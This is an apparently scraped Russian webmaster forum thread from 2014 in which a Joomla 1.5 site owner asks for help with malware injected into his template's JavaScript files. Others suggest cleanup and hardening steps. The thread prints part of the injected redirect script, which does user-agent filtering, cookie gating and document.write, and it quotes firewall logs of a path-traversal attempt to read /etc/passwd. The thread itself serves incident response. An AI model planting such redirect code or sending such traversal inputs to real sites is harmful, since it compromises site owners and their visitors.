http://webmasters.ru/forum/showthread.php?t=54689 SEO форум вебмастеров - Поисковые системы, оптимизация, раскрутка сайта, оптимизация и продвижение сайта в поисковых системах 1743522406 Elesite CMS 60 http://webmasters.ru/forum/images/wm/misc/rss.png http://webmasters.ru/forum http://webmasters.ru/forum/showpost.php?p=575941 Thu, 13 Feb 2014 00:14:52 GMT Пришло сообщение от сапорта яндекса, о том, что на сайте обнаружен вредоносный код. В частности Troj/JSRedir-LH и Mal/ExpJS-BP Проинспектировав исходный код страниц, которые указал Яндекс ничего не обнаружил. Стал проверять используемые JS скрипты. Выяснил, что действительно, в шаблоне yoo_downtown были изменены все JS скрипты. В самое начало был добавлен кусок кода с редиректом. Пример кода: [CODE] (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/18.0|Firefox/18.0.1| jungleobra = jungleobra.split('|'); var donttuch = false; for (var i in jungleobra) { if (stripos(navigator.userAgent, jungleobra[i])!==false) { donttuch = true; break; } } return donttuch; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!barashkalo()) { var cookie = getCookie('parall19els9i1kom10'); if (cookie == undefined) { setCookie('parall19els9i1kom10', true, 86400); document.write(' http://webmasters.ru/forum/showpost.php?p=575942 Thu, 13 Feb 2014 00:27:01 GMT Мистика прям, попробуйте почистить еще. Хотя он може инъектиться с элемента на вашем сайте, я слышал об этом, может на автомате даже. Если так, то проблему надо искать глубже. http://webmasters.ru/forum/showpost.php?p=575943 Thu, 13 Feb 2014 00:27:18 GMT Очень вероятно что на сайте есть файл с кодом, который будет постоянно генерировать данный скрипт и вставлять его в нужные файлы. Ищите этот файл. Самое неприятное что он может быть где угодно. Начните с файлов темы. Я бы советовал искать дыру, откуда был взлом, через какой компонент, плагин и т.д, когда найдете восстановитесь из бэкапа и устраните дыру, затем меняйте все пароли, обновляйте все плагины, компоненты. На всякий случай поставть jsecure А вообще это знак что пора обновлятся до 3-й джумлы. Также проблемы может быть на стороне хостинга. Подробнее об этом тут (http://webmasters.ru/forum/f25/uyazvimost%60-servera-ili-kak-dokazat%60-hosteru-chto-ne-prav-46382/). http://webmasters.ru/forum/showpost.php?p=575944 Thu, 13 Feb 2014 00:32:51 GMT А вообще это знак что пора обновлятся до 3-й джумлы. Подумайте об этом. Если сайт стоящий, то лучше перейти на Джумулу 2.5 или подождать и перейти сразу на 3.5. Просто даже если вы сейчас устраните проблему, то большая вероятность, что найдется другая дырка, ведь 1.5 достаточно дырявая на данный момент благодаря тому, что за это время "умельцы" находят все больше и больше дырок в плагинах и компонентах к ней. http://webmasters.ru/forum/showpost.php?p=575946 Thu, 13 Feb 2014 00:44:57 GMT Нормально настроенный рут решает многие проблемы безопасности на любых движках :icon_lol: http://webmasters.ru/forum/showpost.php?p=575947 Thu, 13 Feb 2014 00:50:12 GMT 3s777, Честно говоря я уже почти обновился до 2.5 с помощью плагина jupgrade, но он не смог подцепить категории и разделы, получилась мешанина. Да еще и sef404 добавляет адреналина, работает через одно место - тоже не очень удачно импортировался. Не стал разгребать и откатился обратно на 1.5... ЗЫ насчет хостера, спасибо, сейчас стуканусь к нему. ---------- Сообщение добавлено 00:50 ---------- Предыдущее 00:47 ---------- Я Джин, Рут сменен, других пользователей в системе с доступом к shell нет. http://webmasters.ru/forum/showpost.php?p=575953 Thu, 13 Feb 2014 01:25:03 GMT Рут сменен, Есть подозрение что вы сменили рут на шаровом аккаунте, но это не то, и к тому же не пасс менять нужно (если бы под рутом был взлом то вам бы не стали просто вирус в шаблон пихать...) а права нужно выставить правильно (и под рутом), а не то что по дефолту на джумле. http://webmasters.ru/forum/showpost.php?p=575957 Thu, 13 Feb 2014 01:49:54 GMT Я Джин, Не понял насчет шарового акка. Есть рут в системе, на него и меняю. Права на джумлу сейчас выставляю максимально правильно :) Просто интересно, какую лазейку нашли... не понятно, изменение файлов требует соотвествующих прав, хотя у меня владелец файлов поставлен apache и группа apache, чтобы движок мог выполнять все действия... возможно тут собака и порылась.... http://webmasters.ru/forum/showpost.php?p=575959 Thu, 13 Feb 2014 02:00:48 GMT Поставьте компонент RSFirewall , возможно он найдёт файлы генераторы. Почитайте тут (http://webmasters.ru/forum/f141/poimal-virus-pomogite-pozhaluista-54051/index2.html), я подробно описал методику действий в похожей ситуации. http://webmasters.ru/forum/showpost.php?p=575963 Thu, 13 Feb 2014 02:24:00 GMT Обновитесь до более свежих версий http://webmasters.ru/forum/showpost.php?p=576221 Thu, 13 Feb 2014 22:26:33 GMT pljus, Посты не надо тут набивать, я уже писал, что установлен последний патч безопасности на 1.5.26, и насчет апгрейда на другие ветки уже писал. PS Поставил плагин - Marco's SQL Iniection Вот что стал сыпать в логах - ** Local File Inclusion [GET:client_id] => ../../../../../../../../etc/passwd ** Local File Inclusion [REQUEST:client_id] => ../../../../../../../../etc/passwd **PAGE / SERVER INFO *REMOTE_ADDR : 162.144.71.243 *REQUEST_METHOD : GET *QUERY_STRING : client_id=../../../../../../../../etc/passwd%00 ** SUPERGLOBALS DUMP (sanitized) *$_GET DUMP -[client_id] => etc/passwd *$_POST DUMP *$_COOKIE DUMP *$_REQUEST DUMP -[client_id] => etc/passwd ../../../../../../../../etc/passwd ** Local File Inclusion [REQUEST:client_id] => ../../../../../../../../etc/passwd **PAGE / SERVER INFO *REMOTE_ADDR : 162.144.71.243 *REQUEST_METHOD : GET *QUERY_STRING : client_id=../../../../../../../../etc/passwd%00 ** SUPERGLOBALS DUMP (sanitized) *$_GET DUMP -[client_id] => etc/passwd *$_POST DUMP *$_COOKIE DUMP *$_REQUEST DUMP -[client_id] => etc/passwd]]> http://webmasters.ru/forum/showpost.php?p=576679 Sat, 15 Feb 2014 01:35:23 GMT Не для набивки постов. Была точно токая же ситуация. Все JS скрипты были изменены, установлен последний патч безопасности на 1.5.26. Использовал AI- Bolit— скрипт для поиска кода на сайте, не панацея конечно, но показывает что и где. Как и в вашем случаи, после полной чистки и всех защитных манипуляций всё возвращалось на исходную, JS скрипты были изменены. Скажу более выкачивался бекап проверялся антивирусами. Корневая папка на хосте зачищалась, всё заливалось обратно с измененными паролями и тд. Через минуту результат был прежний. В моём случаи, решилось всё до ужаса банально, вирус на компьютере. стоял Norton Internet Security мышей не ловил (( скачал кучу лечащих утилит высканил вирусы, перезолил отчищенный бекап и всё стало ок. http://webmasters.ru/forum/showpost.php?p=576885 Sat, 15 Feb 2014 23:24:32 GMT В принципе все решилось... На сайт был поставлен компонент RSFirewall, применены все его рекомендации. Доступ к админке джумлы был прикрыт через .htpasswd Добавил несколько особо подозрительных айпишников в блэк лист. Права на папки и на файлы выставил максимально секьюрно. Ну и еще раз сменены все пароли. Всем спасибо за помощь!